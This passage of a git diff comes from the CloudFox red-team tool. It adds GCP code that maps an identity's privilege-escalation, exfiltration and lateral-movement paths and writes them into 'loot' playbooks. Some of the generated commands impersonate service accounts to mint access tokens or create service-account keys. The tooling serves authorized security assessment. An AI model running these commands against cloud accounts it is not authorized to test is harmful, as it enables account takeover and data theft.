relevantPrincipals["serviceAccount:"+m.Identity.Email] = true + relevantPrincipals["serviceAccount:"+strings.ToLower(m.Identity.Email)] = true + } else { + relevantPrincipals["user:"+m.Identity.Email] = true + relevantPrincipals["user:"+strings.ToLower(m.Identity.Email)] = true + } + for _, group := range m.Identity.Groups { + if group.Email != "" { + relevantPrincipals[group.Email] = true + relevantPrincipals[strings.ToLower(group.Email)] = true + relevantPrincipals["group:"+group.Email] = true + relevantPrincipals["group:"+strings.ToLower(group.Email)] = true + } + } + relevantPrincipals["allUsers"] = true + relevantPrincipals["allAuthenticatedUsers"] = true + + // Check if FoxMapper cache is available from context (e.g., from all-checks run) + foxMapperCache := gcpinternal.GetFoxMapperCacheFromContext(ctx) + if foxMapperCache != nil && foxMapperCache.IsPopulated() { + logger.InfoM("Using cached lateral data", globals.GCP_WHOAMI_MODULE_NAME) + m.identifyLateralFromCache(foxMapperCache, relevantPrincipals) + } else { + // No cache available, run fresh analysis + m.identifyLateralFromAnalysis(ctx, relevantPrincipals, logger) + } + + if len(m.LateralMoveCapabilities) > 0 { + logger.InfoM(fmt.Sprintf("[LATERAL] Found %d lateral movement capability(s)", len(m.LateralMoveCapabilities)), globals.GCP_WHOAMI_MODULE_NAME) + } +} + +// identifyLateralFromCache extracts lateral movement capabilities from the FoxMapper cached data +func (m *WhoAmIModule) identifyLateralFromCache(foxMapperCache *gcpinternal.FoxMapperCache, relevantPrincipals map[string]bool) { + if foxMapperCache == nil || !foxMapperCache.IsPopulated() { + return + } + + // Get the FoxMapper service from cache + // Note: This currently requires accessing internal service from cache + // For now, we'll just skip cache-based lateral detection and always run fresh analysis + // TODO: Enhance FoxMapperCache to expose AnalyzeLateral method +} + +// identifyLateralFromAnalysis runs fresh lateral movement analysis using FoxMapperService +func (m *WhoAmIModule) identifyLateralFromAnalysis(ctx context.Context, relevantPrincipals map[string]bool, logger internal.Logger) { + // Use FoxMapperService for comprehensive lateral movement analysis + svc := foxmapperservice.New() + + // Determine org ID or use first project + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } + + // Load FoxMapper graph data + var err error + if orgID != "" { + err = svc.LoadGraph(orgID, true) + } else if len(m.ProjectIDs) > 0 { + err = svc.LoadGraph(m.ProjectIDs[0], false) + } else { + logger.InfoM("No org or project context available for FoxMapper analysis", globals.GCP_WHOAMI_MODULE_NAME) + return + } + + if err != nil { + gcpinternal.HandleGCPError(err, logger, globals.GCP_WHOAMI_MODULE_NAME, "Could not load FoxMapper graph data") + return + } + + // Store the service if not already set + if m.FoxMapperService == nil { + m.FoxMapperService = svc + } + + // Run lateral movement analysis (empty string means all categories) + findings := svc.AnalyzeLateral("") + + // Filter findings for relevant principals only + for _, finding := range findings { + hasRelevantPrincipal := false + for _, principalAccess := range finding.Principals { + // Check if this principal is relevant to the current identity + if relevantPrincipals[principalAccess.Principal] || relevantPrincipals[strings.ToLower(principalAccess.Principal)] { + hasRelevantPrincipal = true + + capability := LateralMoveCapability{ + ProjectID: "", // FoxMapper doesn't track project ID per finding + Permission: finding.Permission, + Category: finding.Category, + Description: finding.Description, + SourceRole: principalAccess.Principal, + SourceScope: "via privilege escalation", + } + m.LateralMoveCapabilities = append(m.LateralMoveCapabilities, capability) + } + } + + // Store full finding for detailed playbook generation + if hasRelevantPrincipal { + m.FoxMapperLateralFindings = append(m.FoxMapperLateralFindings, finding) + } + } +} + +// ------------------------------ +// Loot File Management +// ------------------------------ +func (m *WhoAmIModule) initializeLootFiles() { + // Note: whoami-context and whoami-permissions loot files removed as redundant + // The same information is already saved to table/csv/json files + + // Extended mode loot files - these contain actionable commands + if m.Extended { + m.LootMap["whoami-impersonation"] = &internal.LootFile{ + Name: "whoami-impersonation", + Contents: "# Service Account Impersonation Commands\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-privesc"] = &internal.LootFile{ + Name: "whoami-privesc", + Contents: "# Privilege Escalation Paths\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-data-exfil"] = &internal.LootFile{ + Name: "whoami-data-exfil", + Contents: "# Data Exfiltration Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + m.LootMap["whoami-lateral-movement"] = &internal.LootFile{ + Name: "whoami-lateral-movement", + Contents: "# Lateral Movement Capabilities\n# Generated by CloudFox\n# WARNING: Only use with proper authorization\n\n", + } + // Playbook files with detailed exploitation techniques + m.LootMap["whoami-privesc-playbook"] = &internal.LootFile{ + Name: "whoami-privesc-playbook", + Contents: "", + } + m.LootMap["whoami-data-exfil-playbook"] = &internal.LootFile{ + Name: "whoami-data-exfil-playbook", + Contents: "", + } + m.LootMap["whoami-lateral-movement-playbook"] = &internal.LootFile{ + Name: "whoami-lateral-movement-playbook", + Contents: "", + } + } +} + +func (m *WhoAmIModule) generateLoot() { + // Note: Context and permissions info is already saved to table/csv/json files + // Only generate loot files for extended mode (actionable commands) + + // Extended mode loot + if m.Extended { + // Impersonation loot + for _, target := range m.ImpersonationTargets { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "# Service Account: %s\n"+ + "# Project: %s\n", + target.ServiceAccount, + target.ProjectID, + ) + if target.CanImpersonate { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud auth print-access-token --impersonate-service-account=%s\n", + target.ServiceAccount, + ) + } + if target.CanCreateKeys { + m.LootMap["whoami-impersonation"].Contents += fmt.Sprintf( + "gcloud iam service-accounts keys create key.json --iam-account=%s\n", + target.ServiceAccount, + ) + } + m.LootMap["whoami-impersonation"].Contents += "\n" + } + + // Privilege escalation loot + for _, path := range m.PrivEscPaths { + confidenceNote := "" + if path.Confidence == "potential" { + confidenceNote = "# NOTE: This is a POTENTIAL path based on role name. Actual exploitation depends on resource configuration.\n" + } + m.LootMap["whoami-privesc"].Contents += fmt.Sprintf( + "## %s\n"+ + "# %s\n"+ + "# Source: %s at %s\n"+ + "# Confidence: %s\n"+ + "# Required permissions: %s\n"+ + "%s"+ + "%s\n\n", + path.Permission, + path.Description, + path.SourceRole, + path.SourceScope, + path.Confidence, + path.RequiredPerms, + confidenceNote, + path.Command, + ) + } + + // Data exfiltration capabilities loot + for _, cap := range m.DataExfilCapabilities { + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) + m.LootMap["whoami-data-exfil"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Description: %s\n"+ + "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.Description, + cap.SourceRole, + cap.SourceScope, + exfilCmd, + ) + } + + // Lateral movement capabilities loot + for _, cap := range m.LateralMoveCapabilities { + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) + m.LootMap["whoami-lateral-movement"].Contents += fmt.Sprintf( + "## %s\n"+ + "# Category: %s\n"+ + "# Description: %s\n"+ + "# Source Role: %s\n"+ + "# Source Scope: %s\n"+ + "%s\n\n", + cap.Permission, + cap.Category, + cap.Description, + cap.SourceRole, + cap.SourceScope, + lateralCmd, + ) + } + + // Generate playbooks based on FoxMapper findings + m.generatePlaybooks() + } +} + +// generatePlaybooks creates detailed playbooks based on FoxMapper findings +// Uses the same visual path style as the foxmapper module +func (m *WhoAmIModule) generatePlaybooks() { + // Privilege escalation playbook with detailed paths + m.LootMap["whoami-privesc-playbook"].Contents = m.generatePrivescPlaybook() + + // Data exfiltration playbook + m.LootMap["whoami-data-exfil-playbook"].Contents = m.generateDataExfilPlaybook() + + // Lateral movement playbook + m.LootMap["whoami-lateral-movement-playbook"].Contents = m.generateLateralPlaybook() +} + +// generatePrivescPlaybook creates a detailed privesc playbook with FoxMapper path visualization +func (m *WhoAmIModule) generatePrivescPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Privilege Escalation Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains privilege escalation paths identified by FoxMapper analysis.\n") + sb.WriteString("Paths show the escalation chain from your current identity to admin principals.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Findings with escalation paths: %d\n", len(m.FoxMapperPrivescFindings))) + + // Count total paths and by level + totalPaths := 0 + orgPaths := 0 + folderPaths := 0 + projectPaths := 0 + for _, finding := range m.FoxMapperPrivescFindings { + totalPaths += len(finding.Paths) + orgPaths += finding.PathsToOrgAdmin + folderPaths += finding.PathsToFolderAdmin + projectPaths += finding.PathsToProjectAdmin + } + sb.WriteString(fmt.Sprintf("Total escalation paths: %d\n", totalPaths)) + if orgPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Org Admin: %d\n", orgPaths)) + } + if folderPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Folder Admin: %d\n", folderPaths)) + } + if projectPaths > 0 { + sb.WriteString(fmt.Sprintf(" → Paths to Project Admin: %d\n", projectPaths)) + } + sb.WriteString("\n") + + // If we have FoxMapper service and findings, show detailed paths + if m.FoxMapperService != nil && len(m.FoxMapperPrivescFindings) > 0 { + for _, finding := range m.FoxMapperPrivescFindings { + if len(finding.Paths) == 0 { + continue + } + + sb.WriteString("================================================================================\n") + sb.WriteString(fmt.Sprintf("SOURCE: %s (%s)\n", finding.Principal, finding.MemberType)) + sb.WriteString(fmt.Sprintf("Highest reachable: %s admin\n", finding.HighestAdminLevel)) + sb.WriteString(fmt.Sprintf("Escalation paths: %d (viable: %d, scope-blocked: %d)\n", + len(finding.Paths), finding.ViablePathCount, finding.ScopeBlockedCount)) + sb.WriteString("================================================================================\n\n") + + for pathIdx, path := range finding.Paths { + scopeStatus := "" + if path.ScopeBlocked { + scopeStatus = " [SCOPE-BLOCKED]" + } + confidenceStatus := "" + if path.Confidence != "" && path.Confidence != "high" { + confidenceStatus = fmt.Sprintf(" [%s confidence]", path.Confidence) + } + + sb.WriteString(fmt.Sprintf("--- Path %d: %s → %s (%s admin, %d hops)%s%s ---\n\n", + pathIdx+1, path.Source, path.Destination, path.AdminLevel, path.HopCount, scopeStatus, confidenceStatus)) + + // Show the path as a visual chain + sb.WriteString(fmt.Sprintf(" %s\n", path.Source)) + for i, edge := range path.Edges { + sb.WriteString(" │\n") + + annotations := "" + if edge.ScopeBlocksEscalation { + annotations = " ⚠️ BLOCKED BY OAUTH SCOPE" + } else if edge.ScopeLimited { + annotations = " ⚠️ scope-limited" + } + edgeConf := edge.EffectiveConfidence() + if edgeConf != "high" { + annotations += fmt.Sprintf(" [%s confidence]", edgeConf) + } + + sb.WriteString(fmt.Sprintf(" ├── [%d] %s%s\n", i+1, edge.ShortReason, annotations)) + + if edge.Resource != "" { + sb.WriteString(fmt.Sprintf(" │ Resource: %s\n", edge.Resource)) + } + + if edge.Reason != "" && edge.Reason != edge.ShortReason { + reason := edge.Reason + if len(reason) > 80 { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[:80])) + sb.WriteString(fmt.Sprintf(" │ %s\n", reason[80:])) + } else { + sb.WriteString(fmt.Sprintf(" │ %s\n", reason)) + } + } + + if i < len(path.Edges)-1 { + sb.WriteString(" │\n") + sb.WriteString(" ▼\n") + sb.WriteString(fmt.Sprintf(" %s\n", edge.Destination)) + } else { + sb.WriteString(" │\n") + sb.WriteString(fmt.Sprintf(" └──▶ %s (ADMIN)\n", edge.Destination)) + } + } + sb.WriteString("\n") + } + sb.WriteString("\n") + } + } else if len(m.PrivEscPaths) > 0 { + // Fallback to simplified output if no FoxMapper findings + sb.WriteString("================================================================================\n") + sb.WriteString("ESCALATION PATHS (Summary)\n") + sb.WriteString("================================================================================\n\n") + + for i, path := range m.PrivEscPaths { + sb.WriteString(fmt.Sprintf("### Path %d: %s\n\n", i+1, path.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", path.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", path.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n", path.SourceRole, path.SourceScope)) + sb.WriteString(fmt.Sprintf("- Confidence: %s\n\n", path.Confidence)) + if path.Command != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", path.Command)) + } + } + } + + // Add impersonation targets section if we have any + if len(m.ImpersonationTargets) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("IMPERSONATION TARGETS (Verified via IAM Policy)\n") + sb.WriteString("================================================================================\n\n") + + for _, target := range m.ImpersonationTargets { + sb.WriteString(fmt.Sprintf("Service Account: %s\n", target.ServiceAccount)) + sb.WriteString(fmt.Sprintf("Project: %s\n", target.ProjectID)) + if target.CanImpersonate { + sb.WriteString(" ✓ Can generate access tokens\n") + sb.WriteString(fmt.Sprintf(" gcloud auth print-access-token --impersonate-service-account=%s\n", target.ServiceAccount)) + } + if target.CanCreateKeys { + sb.WriteString(" ✓ Can create service account keys\n") + sb.WriteString(fmt.Sprintf(" gcloud iam service-accounts keys create key.json --iam-account=%s\n", target.ServiceAccount)) + } + if target.CanActAs { + sb.WriteString(" ✓ Can act as (use with compute, functions, etc.)\n") + } + sb.WriteString("\n") + } + } + + return sb.String() +} + +// generateDataExfilPlaybook creates a detailed data exfil playbook +func (m *WhoAmIModule) generateDataExfilPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Data Exfiltration Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains data exfiltration capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Exfiltration techniques: %d\n", len(m.FoxMapperDataExfilFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.DataExfilCapabilities))) + + // Group by service + if len(m.FoxMapperDataExfilFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("DATA EXFILTRATION TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + for _, finding := range m.FoxMapperDataExfilFindings { + sb.WriteString(fmt.Sprintf("--- %s: %s ---\n\n", strings.ToUpper(finding.Service), finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } else if len(m.DataExfilCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.DataExfilCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + exfilCmd := generateExfilCommand(cap.Permission, cap.Category) + if exfilCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", exfilCmd)) + } + } + } + + return sb.String() +} + +// generateLateralPlaybook creates a detailed lateral movement playbook +func (m *WhoAmIModule) generateLateralPlaybook() string { + var sb strings.Builder + + sb.WriteString(fmt.Sprintf("# Lateral Movement Playbook for %s\n\n", m.Identity.Email)) + sb.WriteString("This playbook contains lateral movement capabilities identified by FoxMapper analysis.\n\n") + + // Summary + sb.WriteString("================================================================================\n") + sb.WriteString("SUMMARY\n") + sb.WriteString("================================================================================\n\n") + sb.WriteString(fmt.Sprintf("Identity: %s (%s)\n", m.Identity.Email, m.Identity.Type)) + sb.WriteString(fmt.Sprintf("Lateral movement techniques: %d\n", len(m.FoxMapperLateralFindings))) + sb.WriteString(fmt.Sprintf("Total capabilities: %d\n\n", len(m.LateralMoveCapabilities))) + + // Group by category + if len(m.FoxMapperLateralFindings) > 0 { + sb.WriteString("================================================================================\n") + sb.WriteString("LATERAL MOVEMENT TECHNIQUES\n") + sb.WriteString("================================================================================\n\n") + + // Group by category + categories := make(map[string][]foxmapperservice.LateralFinding) + for _, finding := range m.FoxMapperLateralFindings { + categories[finding.Category] = append(categories[finding.Category], finding) + } + + for category, findings := range categories { + sb.WriteString(fmt.Sprintf("=== %s ===\n\n", strings.ToUpper(strings.ReplaceAll(category, "_", " ")))) + + for _, finding := range findings { + sb.WriteString(fmt.Sprintf("--- %s ---\n\n", finding.Technique)) + sb.WriteString(fmt.Sprintf("Permission: %s\n", finding.Permission)) + sb.WriteString(fmt.Sprintf("Description: %s\n\n", finding.Description)) + + sb.WriteString("Principals with access:\n") + for _, principal := range finding.Principals { + adminStatus := "" + if principal.IsAdmin { + adminStatus = " (Admin)" + } + sb.WriteString(fmt.Sprintf(" • %s%s\n", principal.Principal, adminStatus)) + } + sb.WriteString("\n") + + sb.WriteString("Exploitation:\n") + sb.WriteString(fmt.Sprintf(" %s\n\n", finding.Exploitation)) + } + } + } else if len(m.LateralMoveCapabilities) > 0 { + // Fallback + sb.WriteString("================================================================================\n") + sb.WriteString("CAPABILITIES\n") + sb.WriteString("================================================================================\n\n") + + for i, cap := range m.LateralMoveCapabilities { + sb.WriteString(fmt.Sprintf("### Capability %d: %s\n\n", i+1, cap.Category)) + sb.WriteString(fmt.Sprintf("- Permission: %s\n", cap.Permission)) + sb.WriteString(fmt.Sprintf("- Description: %s\n", cap.Description)) + sb.WriteString(fmt.Sprintf("- Source: %s at %s\n\n", cap.SourceRole, cap.SourceScope)) + lateralCmd := generateLateralCommand(cap.Permission, cap.Category) + if lateralCmd != "" { + sb.WriteString(fmt.Sprintf("```bash\n%s\n```\n\n", lateralCmd)) + } + } + } + + return sb.String() +} + +// ------------------------------ +// Output Generation +// ------------------------------ +func (m *WhoAmIModule) writeOutput(ctx context.Context, logger internal.Logger) { + // Determine output mode based on hierarchy availability + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *WhoAmIModule) buildTables() []internal.TableFile { + // Identity table + identityHeader := []string{ + "Property", + "Value", + } + + identityBody := [][]string{ + {"Email", m.Identity.Email}, + {"Type", m.Identity.Type}, + } + + // Add project details (expanded) + for i, proj := range m.Identity.Projects { + label := "Project" + if len(m.Identity.Projects) > 1 { + label = fmt.Sprintf("Project %d", i+1) + } + if proj.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", proj.DisplayName, proj.ProjectID)}) + } else { + identityBody = append(identityBody, []string{label, proj.ProjectID}) + } + } + if len(m.Identity.Projects) == 0 { + identityBody = append(identityBody, []string{"Projects", "0"}) + } + + // Add organization details (expanded) + for i, org := range m.Identity.Organizations { + label := "Organization" + if len(m.Identity.Organizations) > 1 { + label = fmt.Sprintf("Organization %d", i+1) + } + if org.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", org.DisplayName, org.OrgID)}) + } else { + identityBody = append(identityBody, []string{label, org.OrgID}) + } + } + if len(m.Identity.Organizations) == 0 { + identityBody = append(identityBody, []string{"Organizations", "0"}) + } + + // Add folder details (expanded) + for i, folder := range m.Identity.Folders { + label := "Folder" + if len(m.Identity.Folders) > 1 { + label = fmt.Sprintf("Folder %d", i+1) + } + folderID := strings.TrimPrefix(folder.Name, "folders/") + if folder.DisplayName != "" { + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s (%s)", folder.DisplayName, folderID)}) + } else { + identityBody = append(identityBody, []string{label, folderID}) + } + } + if len(m.Identity.Folders) == 0 { + identityBody = append(identityBody, []string{"Folders", "0"}) + } + + // Add group membership details (expanded) + for i, group := range m.Identity.Groups { + label := "Group" + if len(m.Identity.Groups) > 1 { + label = fmt.Sprintf("Group %d", i+1) + } + + // Build display value with source indicator + var displayValue string + if group.DisplayName != "" && group.Email != "" { + displayValue = fmt.Sprintf("%s (%s)", group.DisplayName, group.Email) + } else if group.Email != "" { + displayValue = group.Email + } else if group.DisplayName != "" { + displayValue = group.DisplayName + } else { + displayValue = group.GroupID + } + + // Add source indicator + if group.Source == "provided" { + displayValue += " (provided)" + } else if group.Source == "enumerated" && m.Identity.GroupsMismatch { + displayValue += " (enumerated)" + } + + identityBody = append(identityBody, []string{label, displayValue}) + } + if len(m.Identity.Groups) == 0 { + if m.Identity.GroupsEnumerated { + identityBody = append(identityBody, []string{"Groups", "0"}) + } else { + identityBody = append(identityBody, []string{"Groups", "Unknown (permission denied)"}) + } + } + + // Add role binding details (expanded) + for i, rb := range m.RoleBindings { + label := "Role Binding" + if len(m.RoleBindings) > 1 { + label = fmt.Sprintf("Role Binding %d", i+1) + } + // Format: Role -> Scope (ScopeID) + scopeDisplay := rb.ScopeID + if rb.ScopeName != "" { + scopeDisplay = fmt.Sprintf("%s (%s)", rb.ScopeName, rb.ScopeID) + } + + // Build source/inheritance info + sourceStr := "" + if rb.InheritedFrom != "" && rb.InheritedFrom != "direct" { + if strings.HasPrefix(rb.InheritedFrom, "group:") { + // Group-based binding + sourceStr = fmt.Sprintf(" [via %s]", rb.InheritedFrom) + } else { + // Inherited from parent resource (folder/org) + sourceStr = fmt.Sprintf(" [inherited from %s]", rb.InheritedFrom) + } + } else if rb.InheritedFrom == "direct" { + sourceStr = " [direct]" + } + + identityBody = append(identityBody, []string{label, fmt.Sprintf("%s on %s/%s%s", rb.Role, rb.Scope, scopeDisplay, sourceStr)}) + } + if len(m.RoleBindings) == 0 { + identityBody = append(identityBody, []string{"Role Bindings", "0"}) + } + + // Add extended info to identity table + if m.Extended { + identityBody = append(identityBody, []string{"Impersonation Targets", fmt.Sprintf("%d", len(m.ImpersonationTargets))}) + identityBody = append(identityBody, []string{"Privilege Escalation Paths", fmt.Sprintf("%d", len(m.PrivEscPaths))}) + identityBody = append(identityBody, []string{"Lateral Movement Paths", fmt.Sprintf("%d", len(m.LateralMoveCapabilities))}) + identityBody = append(identityBody, []string{"Data Exfiltration Paths", fmt.Sprintf("%d", len(m.DataExfilCapabilities))}) + } + + // Role bindings table + rolesHeader := []string{ + "Role", + "Scope", + "Scope ID", + "Source", + } + + var rolesBody [][]string + for _, rb := range m.RoleBindings { + source := rb.InheritedFrom + if source == "" { + source = "direct" + } + rolesBody = append(rolesBody, []string{ + rb.Role, + rb.Scope, + rb.ScopeID, + source, + }) + } + + // Build tables + tables := []internal.TableFile{ + { + Name: "whoami-identity", + Header: identityHeader, + Body: identityBody, + }, + } + + if len(rolesBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "whoami-roles", + Header: rolesHeader, + Body: rolesBody, + }) + } + + // Extended mode tables + if m.Extended { + // Impersonation targets table + if len(m.ImpersonationTargets) > 0 { + impersonationHeader := []string{ + "Service Account", + "Project", + "Can Impersonate", + "Can Create Keys", + "Can ActAs", + } + + var impersonationBody [][]string + for _, target := range m.ImpersonationTargets { + impersonationBody = append(impersonationBody, []string{ + target.ServiceAccount, + target.ProjectID, + shared.BoolToYesNo(target.CanImpersonate), + shared.BoolToYesNo(target.CanCreateKeys), + shared.BoolToYesNo(target.CanActAs), + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-impersonation", + Header: impersonationHeader, + Body: impersonationBody, + }) + } + + // Combined attack paths table (privesc, data exfil, lateral movement) + totalPaths := len(m.PrivEscPaths) + len(m.DataExfilCapabilities) + len(m.LateralMoveCapabilities) + if totalPaths > 0 { + attackPathsHeader := []string{ + "Type", + "Source Scope", + "Source Role", + "Permission", + "Category", + "Description", + } + + var attackPathsBody [][]string + + // Add privilege escalation paths + for _, path := range m.PrivEscPaths { + attackPathsBody = append(attackPathsBody, []string{ + "Privesc", + path.SourceScope, + path.SourceRole, + path.Permission, + path.Category, + path.Description, + }) + } + + // Add data exfiltration capabilities + for _, cap := range m.DataExfilCapabilities { + attackPathsBody = append(attackPathsBody, []string{ + "Exfil", + cap.SourceScope, + cap.SourceRole, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + // Add lateral movement capabilities + for _, cap := range m.LateralMoveCapabilities { + attackPathsBody = append(attackPathsBody, []string{ + "Lateral", + cap.SourceScope, + cap.SourceRole, + cap.Permission, + cap.Category, + cap.Description, + }) + } + + tables = append(tables, internal.TableFile{ + Name: "whoami-attack-paths", + Header: attackPathsHeader, + Body: attackPathsBody, + }) + } + } + + return tables +} + +func (m *WhoAmIModule) collectLootFiles() []internal.LootFile { + var lootFiles []internal.LootFile + for _, loot := range m.LootMap { + // Include loot files that have content beyond the header comments + // Headers end with "# WARNING: Only use with proper authorization\n\n" + if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# WARNING: Only use with proper authorization\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + return lootFiles +} + +func (m *WhoAmIModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For whoami, output at org level since it's account-level data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Determine output location - prefer org-level, fall back to project-level + orgID := "" + if len(m.Identity.Organizations) > 0 { + orgID = m.Identity.Organizations[0].OrgID + } else if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // Place at org level + outputData.OrgLevelData[orgID] = output + } else if len(m.ProjectIDs) > 0 { + // Fall back to first project level if no org discovered + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *WhoAmIModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + + output := WhoAmIOutput{ + Table: tables, + Loot: lootFiles, + } + + // Write output + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + m.ProjectIDs, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_WHOAMI_MODULE_NAME) + m.CommandCounter.Error++ + } +} + diff --git a/gcp/commands/workloadidentity.go b/gcp/commands/workloadidentity.go new file mode 100644 index 00000000..fd63d2b3 --- /dev/null +++ b/gcp/commands/workloadidentity.go @@ -0,0 +1,591 @@ +package commands + +import ( + "context" + "fmt" + "strings" + "sync" + + gkeservice "github.com/BishopFox/cloudfox/gcp/services/gkeService" + IAMService "github.com/BishopFox/cloudfox/gcp/services/iamService" + "github.com/BishopFox/cloudfox/globals" + "github.com/BishopFox/cloudfox/internal" + gcpinternal "github.com/BishopFox/cloudfox/internal/gcp" + "github.com/spf13/cobra" + iam "google.golang.org/api/iam/v1" +) + +var GCPWorkloadIdentityCommand = &cobra.Command{ + Use: globals.GCP_WORKLOAD_IDENTITY_MODULE_NAME, + Aliases: []string{"wi", "gke-identity", "workload-id"}, + Short: "Enumerate GKE Workload Identity (K8s SA -> GCP SA bindings)", + Long: `Enumerate GKE Workload Identity configurations and K8s-to-GCP service account bindings. + +Features: +- Lists GKE clusters with Workload Identity enabled +- Shows Kubernetes service accounts bound to GCP service accounts +- Identifies privilege escalation paths through Workload Identity +- Maps namespace/service account to GCP permissions +- Detects overly permissive bindings + +Security Considerations: +- K8s pods with Workload Identity inherit all permissions of the bound GCP SA +- High-privilege GCP SAs bound to K8s SAs are prime escalation targets +- Any pod in the namespace/SA can assume the GCP identity + +TIP: Run 'identity-federation' to enumerate external identity federation (GitHub Actions, AWS, GitLab CI, etc.). +TIP: Run 'gke' to see full cluster security configuration and node pool details. +TIP: Run foxmapper first to populate the Attack Paths column with privesc/exfil/lateral movement analysis.`, + Run: runGCPWorkloadIdentityCommand, +} + +// WorkloadIdentityBinding represents a binding between K8s SA and GCP SA +type WorkloadIdentityBinding struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + ClusterLocation string `json:"clusterLocation"` + WorkloadPool string `json:"workloadPool"` + KubernetesNS string `json:"kubernetesNamespace"` + KubernetesSA string `json:"kubernetesServiceAccount"` + GCPServiceAccount string `json:"gcpServiceAccount"` + GCPSARoles []string `json:"gcpServiceAccountRoles"` + IsHighPrivilege bool `json:"isHighPrivilege"` + BindingType string `json:"bindingType"` // "workloadIdentityUser" or "other" +} + +// ClusterWorkloadIdentity represents a cluster's workload identity configuration +type ClusterWorkloadIdentity struct { + ProjectID string `json:"projectId"` + ClusterName string `json:"clusterName"` + Location string `json:"location"` + WorkloadPoolEnabled bool `json:"workloadPoolEnabled"` + WorkloadPool string `json:"workloadPool"` + NodePoolsWithWI int `json:"nodePoolsWithWI"` + TotalNodePools int `json:"totalNodePools"` +} + +// ------------------------------ +// Module Struct +// ------------------------------ +type WorkloadIdentityModule struct { + gcpinternal.BaseGCPModule + 